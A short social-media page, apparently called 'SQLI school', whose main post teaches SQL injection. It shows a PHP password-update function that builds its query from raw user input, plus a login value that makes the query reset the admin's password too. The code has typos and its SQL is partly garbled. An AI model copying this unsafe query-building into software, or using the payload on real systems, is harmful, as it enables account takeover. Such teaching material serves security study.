SQLI school

This is the official sqli school ... A page about learning everything about sqli : detecting , explo

09/08/2016

SQLI attack ... :
(Password modification )
Exmp:
Code begins here :
function setPasswd ($Login, $ password) {
$ sql = 'update Login
set password = " '. $ password.' "
where Login = " '. $ login. ' " ' ;
$ result = $ this-> excecuteSQL ($ sql) ;
}
Code edndes here
We will modify the $login by :
SuperTnx" or "admin
So the sql code becomes :
update Login set password = "example"
where account = "SuperTnx" or "admin" ;
By ex*****on , not only the password of login SuperTnx will change ... but also admin 's

07/08/2016

Ok ... are there any suggestions about the next lessons inchallah?

07/08/2016

100 likes and we start

Claim ownership or report listing

Website

facebook.com